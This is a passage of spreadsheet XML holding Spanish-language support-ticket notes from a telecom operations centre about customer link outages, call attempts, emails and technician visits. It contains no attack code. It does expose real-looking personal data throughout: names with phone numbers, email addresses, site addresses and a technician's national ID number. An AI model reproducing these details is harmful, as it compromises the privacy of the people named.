DIRECCCION: CALLE AL MIRADOR 93 AVE NORTE EDIFICIO VICTORIA TERCER NIVEL COLONICA ESCALON ESCALON
ATENDERA EN SITIO: FRANCISCO ARDON
-ID 3001684186
**</t>
  </si>
  <si>
    <t>F4627325</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALFREDO  BANEGAS AL 87743905 INDICA QUE POR EL MOMENTO SE ENCUENTRA ESTABLE PERO SOLICITA QUE SE LE LLAME EN 1 HR NUEVAMENTE PARA CONFIRMAR**
-ID 3001676048 - 3001676275
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALFREDO  BANEGAS AL 87743905 INIDCA QUE REALIZO UN TES DE VELOCIDAD PERO INDICA QUE LA NAVEGACION ESTA BIEN SOLO DESCARGA INDICA QUE TIENE 14 MEGAS || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE  **
-ID 3001690671
**</t>
  </si>
  <si>
    <t>F4627346</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRAKLIN ORELLANA AL 23081000 EXT 301646  NO RESPONDE || SE INTENTARA LUEGO**
-ID 3001687812
**</t>
  </si>
  <si>
    <t>SE  TIENE CORREO DE CLIENTE INDICANDO QUE SE PUEDE PROCEDER CON EL CIERRE
DE: TIC ORELLANA, FRANKLIN &lt;FRANKLIN.ORELLANA@BANRURAL.COM.GT&gt;
ENVIADO: LUNES, 4 DE JULIO DE 2022 11:21
PARA: KEVIN OBRIAN GARCIA MALDONADO &lt;KEVIN.GARCIA@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; TIC - DIRECCION DE TELECOMUNICACIONES (LISTA) &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: AGENCIAS BANRURAL REGIÓN HUEHUETENANGO - DOWN
GRACIAS POR EL SEGUIMIENTO ESTIMADO KEVIN, FAVOR PROCEDER CON EL CIERRE DE LOS TICKETS.
SALUDOS.
*-*-*-*</t>
  </si>
  <si>
    <t>F4627358</t>
  </si>
  <si>
    <t>SE LLAMA A TÉCNICO FABIO CIFUENTES , QUIEN INDICA QUE CLIENTE A CUENTA CON SALIDA HACIA INTERNET, CLIENTE  GERONIMO  CHAVEZ  CONFIRMA LA OPERATIVIDAD DEL MISMO
3001787442
COLA:
NOMBRE: 58261473
NÚMERO: 58261473
DURACIÓN: 0:04:28
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 58261473
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: DIONICIO.VELIZ
FECHA Y HORA LOCALES: 4/07/2022 16:40:21</t>
  </si>
  <si>
    <t>SE PLATICA CON EL SUP LUIS RECINOS DONDE NOS INFORMA QUE EL TEC. PABLO CIFUENTES NO HA LLEGADO AUN AL NODO QUE HA TENIDO INCONVENIENTES CON EL TRAFICO QUE NOS TIENE AVANCES DENTRO DE 35 MINUTOS
3001717852
COLA:
NOMBRE: A: LUIS AROLDO RECINOS MORALES
NÚMERO: 58261474
DURACIÓN: 0:01:15
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 58261474
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.CORADO
FECHA Y HORA LOCALES: 4/07/2022 11:35:55</t>
  </si>
  <si>
    <t>F4627362</t>
  </si>
  <si>
    <t>F4627365</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERNESTO RUBIO AL 77979726 CONFIRMA SERVICIO ESTABLE Y OPERATIVO || SOLICITA QUE SE LE ENVIE EL REPORTE DEL TICKET Y QUE SE PUEDE CERRAR EL TICKET **
-ID 3001870543
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERNESTO RUBIO AL 77979726  INDICA QUE POR EL MOMENTO ESTA ESTABLE PERO QUE HABIA SOLICITADO SE QUEDARA EN OBSERVACION 24 HRS**
-ID 3001774544
**</t>
  </si>
  <si>
    <t>NOTA CLIENTE INDICO QUE MEJOR SE MANTUVIERA EN OBSERVACIÓN DURANTE  24 HORAS   YA QUE ACTUALMENTE OBSERVA EL SERVICIO OPERATIVO Y ESTABLE // CLIENTE INDICA QUE AL MOMENTO DE OBSERVAR NUEVAMENTE EL PROBLEMA DE LA INESTABILIDAD EL REPORTARA PARA QUE SE PUEDA ENVIAR NUEVAMENTE LA VISITA
RESULTADO: LLAMADA HECHA
NOMBRE: 0050377979726
NÚMERO: 0050377979726
INICIO: HOY, 09:25
FIN: HOY, 09:30
DURACIÓN: 5:19
ID DE LLAMADA: 3001685577</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, CON LOS SOLICITADOS
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: MARTES, 5 DE JULIO DE 2022 11:38
PARA: ELSALVADOR_ITTCASOS@DAVIVIENDA.COM.SV &lt;ELSALVADOR_ITTCASOS@DAVIVIENDA.COM.SV&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: REPORTE DE SERVICIO | IP2129150SV | BANCO DAVIVIENDA SALVADOREÑO S.A.
BUEN DÍA ESTIMADO CLIENTE UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, LE COMENTAMOS QUE LO REALIZADO FUE LO SIGUIENTE.
SE APLICO CAMBIO DE NEGOCIACIONES AL EQUIPO ETX , Y AL  MOMENTO DE REALIZAR EL CAMBIO OBSERVAMOS EL SERVICIO ESTABLE Y SIN PERDIDAS.
ADJUNTAMOS PRUEBA.
&lt;AAHUSVZZN1D1EID1&gt;PING -C 1500 -S 1024 -M 30 -B 10.136.65.170
  PING 10.136.65.170: 1024  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.136.65.170 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>F4627370</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 77802145 MENCIONA QUE CIERRAN A LAS 12:00 PERO CONFIRMA QUE EL SERVICIO YA ESTA OPERATIVO Y ESTABLE
-ID 3001707273</t>
  </si>
  <si>
    <t>###TECNICO ASIGNADO BAGNER MÉRIDA	650274		2319 64617 1301 ESTA A TRESHORAS DE CAMINO###
SE LLAMA AL CLIENTE WILLIAM MENDEZ PARA VERIFICAR SI ESPERA DESPUES DE LAS 12 DE MEDIO DIA PERO NO SE TIEN RESPUESTA
RESULTADO: LLAMADA HECHA
NOMBRE: 46863636
NÚMERO: 46863636
INICIO: HOY, 10:34
FIN: HOY, 10:34
DURACIÓN: 0:03
ID DE LLAMADA: 3001701772
RESULTADO: LLAMADA HECHA
NOMBRE: 46863636
NÚMERO: 55280199
INICIO: HOY, 10:36
FIN: HOY, 10:37
DURACIÓN: 0:32
ID DE LLAMADA: 3001702158</t>
  </si>
  <si>
    <t>F4627386</t>
  </si>
  <si>
    <t>SE LLAMA AL NUMERO  24297456 ATIENDE EL SR. TRIGUEROS QUIEN SOLICITA QUE SE LE CONTACTE EN 30 MINUTOS. REVISARÁ SI SU PBX NO ESTA APAGADA.
3001679675
COLA:
NOMBRE: A: 0050324297456
NÚMERO: 0050324297456
DURACIÓN: 0:00:04
ESTADO: MARCANDO
DETALLES: 0050324297456
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 4/07/2022 08:57:49</t>
  </si>
  <si>
    <t>F4627399</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA DESCARTAR TEMAS DE ENERGIA EN PUNTO REMOTO.
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: LUNES, 4 DE JULIO DE 2022 15:25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MESA DE SERVICIO &lt;MESADESERVICIO@BANCOAGRICOLA.COM.SV&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_BANCO_AGRICOLA_SV_ATM_HOTEL_LAS_GUITARRAS_LA_LIBERTAD"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7399
ID: IPG003903SV
IDENTIFICADOR DEL CLIENTE:  CC_BANCO_AGRICOLA_SV_ATM_HOTEL_LAS_GUITARRAS_LA_LIBERTAD
UBICADO EN:  LA LIBERTADKM. 42CAJERO HOTEL LA GUITARRA/TUNCO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4627400</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JAIME PACHECO AL 72895727 INDICA QUE LE ENVIARON UN WHATSAPP DONDE LE DICEN QUE LLEGARAN AL SITIO A VERIFICAR **
-ID 3001694902
**</t>
  </si>
  <si>
    <t>F4627401</t>
  </si>
  <si>
    <t>** SE LLAMA A CLIENTE MARLON RUIZ  AL 48413585  SE BRINDA RETROALIMENTACION **
-ID 3001745361
**</t>
  </si>
  <si>
    <t>F4627409</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA GESTION DE PERMISOS PARA LA VISITA PARA EL DÍA DE MAÑANA A LAS  10:00 AM
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: LUNES, 4 DE JULIO DE 2022 18:07
PARA: HCRUZ@AVANZBANC.COM &lt;HCRUZ@AVANZBANC.COM&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS
BUENA TARDE ESTIMADO CLIENTE UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO PARA EL INGRESO DE LOS TÉCNICOS QUE SE PRESENTARA EN SITIO, ASÍ MISMO SOLICITAMOS DE SU APOYO BRINDANDO LA DIRECCIÓN EXACTA PARA QUE LOS TÉCNICOS PUEDAN PRESENTARSE.
VISITA PARA MAÑANA  5/07/2022 A LAS  10:00 AM
ADJUNTAMOS LOS DATOS DEL TÉCNICO
MILTON JOSE JIMENEZ TORRES ¿ 89276714 CEDULA 561-070779-0002Q
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HERNALDO JOSE CRUZ 87201235 MENCIONA QUE SI CUENTAN CON ENERGIA EN PR PERO ES UN ATM POR LO QUE CLIENTE SOLICITA SE PUEDA VALIDAR SI ES NECESARIO ENVIAR VISITA TECNICA
SI FUESE NECESARIA LA VISITA ENVIAR LOS DATOS AL CORREO HCRUZ@AVANZBANC.COM Y EL VA CONFIRMAR LA DIRECCION, EL HORARIO DE LA VISITA
-ID 3001731800</t>
  </si>
  <si>
    <t>F4627415</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JAIME PACHECO 72895727 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001683152</t>
  </si>
  <si>
    <t>F4627418</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE ENLACE MEJORÓ DE MODO CONSIDERABLE, SE MANTENDRÁ ABIERTO EL TICKET HASTA MAÑANA A LAS 10:00AM A SOLICITUD DE CLIENTE.
HAY CORREO SEGUIMIENTO, SEGUIR EL HILO Y NO CREAR NUEVA COLA POR FAVOR.
ASUNTO: RE: 863400011 | MATERIAL FOTOGRAFICO</t>
  </si>
  <si>
    <t>F4627431</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSUE HERRERA AL 506 70136426 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001686233
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PRUDENCIO AL 41511219 NO RESPONDE SE INTENTARA LUEGO **
ID 3001685982
**</t>
  </si>
  <si>
    <t>F4627440</t>
  </si>
  <si>
    <t>CLIENTE  IDALMA AYALA 70392531 VALIDA EL SERVICIO, INDICA QUE UNO DE LOS NUMERO NO TIENE GRABACIÓN PERO SE LE COMENTA QUE ESO ES TEMA DE LA PBX, TIENE QUE HABLAR CON EL EJECUTIVO PARA VALIDAR CON QUIEN SUBCONTRATO LA PBX YA QUE A NIVEL DE CNOC O DESPACHO NO SE PUEDE REVISAR ESA CONFIGURACIÓN DE LA PBX. LLAMADAS ENTRANTES Y SALIENTES COMPLETAN. SE PROCEDE AL CIERRE DEL CASO.
3001745773
COLA:
NOMBRE: A: 0050370392531
NÚMERO: 0050370392531
DURACIÓN: 0:00:01
ESTADO: MARCANDO
DETALLES: 0050370392531
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 4/07/2022 13:34:51</t>
  </si>
  <si>
    <t>F4627441</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE 70737924 PARA BRINDAR RETROALIMENTACION
-ID 3001699305 - 3001699576</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 70737924 PARA BRINDAR RETROALIMENTACION
-ID 3001797197</t>
  </si>
  <si>
    <t>F4627458</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 4 DE JULIO DE 2022 10:32
PARA: LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; RAMOS LERIZTA ILIANA &lt;IRLERIZT@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 70019OH ::: TICKET CNOC IMBBL004469 ::: "SERVICIO FUERA"
BUEN DÍA
    ESTIMADO CLIENTE DANDO SEGUIMIENTO AL CASO, SOLICITAMOS DE SU APOYO VALIDANDO COMO OBSERVA EL SERVICIO ACTUALMENTE, YA QUE EL MISMO SE ENCUENTRA OPERATIVO Y ESTABLE.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 51 74 52 99 RESPONDE KARINA RUIZ MENCIONA QUE YA SE ENCUENTRA EL TICKET INTERNO CERRADO
-ID 3001704618</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 (55) 5174 5299 NO RESPONDEN, SE INTENTARA LUEGO
-ID 3001701154</t>
  </si>
  <si>
    <t>F4627461</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN CHIVALAN 44894299 MENCIONA QUE NO ESTAN LABORANDO EL DIA DE HOY POR LO QUE SOLICITA LLAMADA PARA MAÑANA A LAS 8:00 HRS
-ID 3001701883</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANCKLIN ORELLANA AL 44990369 CLIENTE CONFIRMA LOS ACCESOS PARA MAÑANA E INDICA QUE YA VA A RESPONDER CORREO**
-ID 3001791491
**</t>
  </si>
  <si>
    <t>F4627467</t>
  </si>
  <si>
    <t>CLIENTE MARICELA RODRIGUEZ  7822-4498 APOYA UBICANDO EQUIPO ASMI54L ALARMADO, PROCEDE A REINICIARLO Y EQUIPO QUEDA CON LAS MISMAS LUCES, SE ABRIRÁ WO PARA LA REVISIÓN, ID DE LLAMADA: 3001690650
ESTADO ASMI54L
PWR:    VERDE
ALMR:  ROJO
SYNC1: ROJO</t>
  </si>
  <si>
    <t>SE HACE UN NUEVO INTENTO, PERO SIN EXITO, SE INTENTARÁ VALIDAR EN 15 MINUTOS
3001750116
COLA:
NOMBRE: A: 0050378224498
NÚMERO: 0050378224498
DURACIÓN: 0:00:02
ESTADO: MARCANDO
DETALLES: 0050378224498
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 4/07/2022 13:57:53</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE   7822-4498 PARA VALIDAR PERO NO RESPONDE.
3001749965
COLA:
NOMBRE: A: 0050378224498
NÚMERO: 0050378224498
DURACIÓN: 0:00:01
ESTADO: MARCANDO
DETALLES: 0050378224498
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 4/07/2022 13:57:07</t>
  </si>
  <si>
    <t>F4627470</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 4 DE JULIO DE 2022 10:45
PARA: LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; YAÑEZ FRAGA RODRIGO MARTIN &lt;RYFRAGA@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 1525981OH::: TICKET CNOC IMGMD005511::: "LINK DOWN"
BUEN DÍA
    ESTIMADO CLIENTE DANDO SEGUIMIENTO AL CASO, SOLICITAMOS DE SU APOYO VALIDANDO COMO OBSERVA EL SERVICIO ACTUALMENTE, YA QUE EL MISMO SE ENCUENTRA OPERATIVO Y ESTABLE.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 51 74 52 99 RESPONDE KARINA RUIZ MENCIONA QUE YA OBSERVAN EL SERVICIO OPERATIVO Y ESTABLE
-ID 3001704618</t>
  </si>
  <si>
    <t>F4627475</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE MANUEL 79104967 QUIEN APOYA REINICIANDO PERO EL INCONVENIENTE PERSISTE
-ID 3001693690
NOMBRE DEL CLIENTE: LA CANTERA S.A
UBICACIÓN:CANTON OJO DE AGUA A 2.5 KILOMETROS SOBRE CARRETERA LITORAL SOBRE CALLE QUE CONDUCE A SANTIAGO DE MARIA VUELTA DEL CURA PLANTEL LA ULERA USULUTAN
CONTACTO EN SITIO: JOSE ESQUIVEL 25099075
HORARIO DE ATENCION:7:00 - 16:00
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JOSE ESQUIVEL 25099075 INDICAN QUE JOSE ESQUIVEL ESTA EN ALMUERZO POR LO QUE SOLICITA SE REALICE LA VISITA A LAS 13:30 HRS
-ID 3001737965</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RAUL MARTINEZ 63038763 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 3001693393</t>
  </si>
  <si>
    <t>F4627484</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROSENDO URBINA 87132322 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA EN 10 MIN
-ID 3001706042</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ROSENDO URBINA 87132322  NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO**
-ID 3001730745
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ROSENDO URBINA 87132322 PERO CLIENTE NO LOGRA UBICAR LOS EQUIPOS DE CLARO
-ID 3001734042
NOMBRE DEL CLIENTE: CORTE SUPREMA DE JUSTICIA
UBICACIÓN:ROSENDO URBINA 87132322
CONTACTO EN SITIO:  ROSENDO URBINA 87132322
HORARIO DE ATENCION:8:00 - 13:00 HRS
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROSENDO URBINA 87132322  NO RESPONDE, SE INTENTARA LUEGO
-ID 3001710302</t>
  </si>
  <si>
    <t>SE PLATICA CON EL TEC. JEYSON HERNANDEZ NOS INFORMA QUE ESTA REALIZANDO LOS ULTIMOS EMPALMES DE LA FO QUE LE DEVOLVAMOS LA LLAMADA DENTRO DE 45 MINUTOS YA QUE SE ENCUENTRAN REALIZANDO LOS SEGUNDOS EMPALMES DE LOS HILOS DE LA FO DE LOS 300 MTRS
3001923966
COLA:
NOMBRE: A: 50558499292
NÚMERO: 50558499292
DURACIÓN: 0:00:54
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 50558499292
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.CORADO
FECHA Y HORA LOCALES: 5/07/2022 13:06:07</t>
  </si>
  <si>
    <t>F4627499</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 4 DE JULIO DE 2022 12:55
PARA: JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;; ESTEBAN.CASILLAS@KOS.COM.MX &lt;ESTEBAN.CASILLAS@KOS.COM.MX&gt;
CC: SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: 20589264 // VENTAS Y MERCADEO, S.A
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4627504</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL PERO NO RESPONDEN, SE INTENTARA LUEGO
-ID 3001692135</t>
  </si>
  <si>
    <t>F4627505</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO HERNÁNDEZ 77576937 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001888471</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO HERNÁNDEZ 78549650 MENCIONA QUE ESTARA REALIZANDO PRUEBAS POR LO QUE SOLICITA LLAMADA EN 10 MIN AL NUMERO 77576937
-ID 3001882315</t>
  </si>
  <si>
    <t>F4627507</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE TONI CANDRAYAL 70700120 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001773209
**</t>
  </si>
  <si>
    <t>F4627512</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ESTEBAN CASILLAS 68751763 MENCIONA QUE EL SERVICIO ES INESTABLE, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001711147</t>
  </si>
  <si>
    <t>F4627528</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS GALINDO  AL 59229513  -  2420 7200  EXT. 2345 NO RESPONDE || SE INTENTARA
 LUEGO **
-ID 3001750024- 3001750241
**</t>
  </si>
  <si>
    <t>F4627567</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 4 DE JULIO DE 2022 13:06
PARA: JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;; RAFAEL.PAIZ@OJ.GOB.SV &lt;RAFAEL.PAIZ@OJ.GOB.SV&gt;; CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;
CC: SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: ID1168059SV // CORTE SUPREMA DE JUSTICIA - ORGANO JUDICIAL.
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4627571</t>
  </si>
  <si>
    <t>SE INTENTA MARCAR A CLIENTE CECY ROBELS VIA VIO PARA DAR RETRO PERO NO RESPONDE 78039274 - 23067331</t>
  </si>
  <si>
    <t>F4627573</t>
  </si>
  <si>
    <t>CLIENTE ROBERTO MANCIA 74876335 APOYA UBICANDO EQUIPO ASMI54L ALARMADO, PROCEDE A REINICIARLO PERO QUEDA DE LA MISMA MANERA, SE ABRIRÁ WO PARA LA REVISIÓN. ID DE LLAMADA: 3001707240
ESTADO ASMI54L:
PWR:  VERDE
ALM:   ROJO
SYNC1: ROJO</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE ROBERTO MANCIA 78555418 / 74876335 CLIENTE VALIDA EL E1 OPERATIVO. AUTORIZA EL CIERRE DEL CASO. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4627583</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WENDY CHICHE 44359072 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001713457</t>
  </si>
  <si>
    <t>F4627585</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE VICTOR RIOS AL 58064113 INDICA QUE NO SE ENCUENTRA EN SITIO PERO QUE SOLICITARA  QUE REVISEN INTERNAMENTE **
-ID 3001712031
**</t>
  </si>
  <si>
    <t>F4627603</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SERGIO MEZA 89881354 MENCIONA QUE ES NUMERO EQUIVOCADO
-ID 3001716541</t>
  </si>
  <si>
